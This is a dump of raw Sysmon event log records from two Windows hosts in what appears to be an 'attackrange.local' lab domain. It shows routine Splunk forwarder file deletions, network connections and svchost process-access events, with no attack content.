Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AAED3220C1FE771F2A98937BEE76A63,SHA256=337D5DCE1D046CC363F39D6B6B09860C2AD746EFC5FB6A73C8E7C5A8ECD3904B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106071Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:53.391{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=032137F79B4627A76E11FB77AC3BB76A,SHA256=AF387A0E39D422BA180C934FDAC9C6D9CC6DCE9F498CB6B6466EEC1084CEBC02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082904Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:53.500{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE2053B65FE05386DD08FAD6645D277D,SHA256=90CB1D9833766FE0578FC72486DEE8007A414BA6923384D263738477110D290F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106072Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:54.416{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C18CD67565F0015C97270203129274C,SHA256=FBF4D464791257EE98124469842A9EF4528441A27A8F05641084F14E68ED9C57,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082906Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:51.585{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50126-false10.0.1.12-8000- 23542300x800000000000000082905Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:54.562{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5D6920E1C70F9D81D15C55B9066063E,SHA256=2DB1D0A4B96482F6DBFAF46E4BFC2B06B754B48E5FC645ABBE0B9F6AFE07440D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082907Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:55.562{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9744C4847082D2B254352DD3A521EA3A,SHA256=3196E9A702A33F66FB8914BA4B95836302FC2F94DD4D1FF85C0C6E1FDC7587BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106073Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:55.424{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52CE474F59D9E86AE6280B689B0189CD,SHA256=6B0BDDF51D2BBE6D240D4A6496E185A64F38409049649B1B80D6DCD9222B0963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082908Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:56.617{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F96B9C76E30253FE9DA9A1C9966206E,SHA256=74245E86B2F697F0D5FE3E116EDAB3D294EC51B19D01D127D0C24EE8D4429455,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106076Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:56.959{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106075Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:56.428{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54B6B0BB1816EEDC4872E6F1E730048E,SHA256=747EAEC642E0F3E1B9EEB95E163EAA22C20886296B3353E7D669FEC3DEFDDE2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106074Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:55.242{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51825-false10.0.1.12-8000- 23542300x8000000000000000106104Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C40F1E808D9C117BBED73CBBE68BF9,SHA256=36FCC5CCEF8D12026628EF066A332024515DE9B9BED5A4EA943A616F7A5F53E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082909Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:57.742{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B28030AB653021E64E098CE6162B7A8C,SHA256=89CE88E448380A4402E7FD0240AB0B39A0CC9145C93B399CC9E14FC35983DAF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106103Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.375{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106102Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.375{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106101Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.375{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106100Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106099Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106098Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106097Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106096Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106095Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106094Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106093Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106092Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106091Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106090Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106089Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106088Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106087Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.374{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106086Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106085Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106084Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106083Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106082Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106081Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106080Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:57.373{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 